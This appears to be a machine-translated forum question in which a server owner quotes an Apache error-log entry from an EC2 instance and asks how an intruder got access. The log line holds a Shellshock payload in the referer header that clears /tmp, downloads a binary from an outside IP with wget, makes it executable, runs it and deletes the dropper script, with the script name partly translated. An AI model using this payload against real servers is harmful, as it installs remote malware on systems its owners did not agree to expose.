Я просматривал свои журналы и заметил очень странную строку.
[Пт, 26 июня, 21:21:36.420706 2015] [: ошибка] [pid 21172] [клиент 58.213.123.107:56538] Целевой скрипт WSGI не найден или не может получить статистику: /opt/python/current/app/application.py, реферер: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-foxr >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-foxr >> /tmp/Run.sh;echo /tmp/China.Z-foxr >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp /Выполнить.sh;/tmp/Выполнить.sh"
Похоже, кто-то смог загрузить файл, изменить его на 777, запустить и удалить все это из папки /tmp/.
Я очень запутался, так как для подключения к экземпляру ec2 по SSH требуется файл авторизации от Amazon, и я сомневаюсь, что они получили доступ к этому файлу.
Есть ли другой способ, которым они могли бы получить доступ? Могут ли быть некоторые настройки разрешений, которые неверны для моего экземпляра?